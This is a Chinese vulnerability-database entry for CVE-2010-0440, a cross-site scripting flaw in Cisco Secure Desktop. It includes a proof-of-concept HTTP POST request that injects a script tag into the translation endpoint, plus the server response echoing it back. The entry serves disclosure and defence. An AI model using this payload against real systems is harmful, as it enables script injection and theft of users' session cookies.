Cisco Secure Desktop translation参数跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118942 漏洞类型 跨站脚本
发布时间 2010-01-26 更新时间 2010-01-26
CVE编号 CVE-2010-0440 CNNVD-ID CNNVD-201002-022
漏洞平台 Hardware CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/33567
https://www.securityfocus.com/bid/37960
https://cxsecurity.com/issue/WLB-2010020153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201002-022
|漏洞详情
CiscoSecureDesktop(CSD)可以通过加密降低远程用户注销或SSLVPN会话超时后Cookies、浏览器历史记录、临时文件和下载内容在系统上所遗留的风险。CiscoSecureDesktop的+CSCOT+/translation中存在跨站脚本攻击漏洞。由于没有充分过滤写入脚本start.html的binary/mainv.js的eval语句,远程攻击者可以借助一个特制的POST请求参数,触发跨站脚本攻击,导致任意web脚本和HTML注入。
|漏洞EXP
source: http://www.securityfocus.com/bid/37960/info

Cisco Secure Desktop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to Cisco Secure Desktop 3.5 are vulnerable. 

REQUEST:
POST https://www.example.com/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 
Host: www.example.com 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Connection: keep-alive 
Referer: https://www.example.com/CACHE/sdesktop/install/start.htm 
Content-Type: application/xml; charset=UTF-8 
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache 
Cache-Control: no-cache 
Content-Length: 56

Starting, please wait..."><script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK 
Server: Cisco AWARE 2.0 
Content-Type: text/html; charset=UTF-8 
Cache-Control: no-cache 
Pragma: no-cache 
Connection: Keep-Alive 
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122

trans["Starting, please wait...\"><script>alert(1);</script>"] = "Starting, please wait...\"><script>alert(1);</script>";
|受影响的产品
Cisco Secure Desktop 3.4.2048 Cisco Secure Desktop 3.1.1 Cisco Secure Desktop 3.1.1.45 Cisco Secure Desktop 3.1.1.33 Cisco Secure Desktop 3.1
|参考资料

来源:tools.cisco.com
链接:http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
来源:VUPEN
名称:ADV-2010-0273
链接:http://www.vupen.com/english/advisories/2010/0273
来源:BID
名称:37960
链接:http://www.securityfocus.com/bid/37960
来源:BUGTRAQ
名称:20100201[CORE-2010-0106]CiscoSecureDesktopXSS/JavaScriptInjection
链接:http://www.securityfocus.com/archive/1/archive/1/509290/100/0/threaded
来源:MISC
链接:http://www.coresecurity.com/content/cisco-secure-desktop-xss
来源:SECUNIA
名称:38397
链接:http://secunia.com/advisories/38397
来源:NSFOCUS
名称:14441
链接:http://www.nsfocus.net/vulndb/14441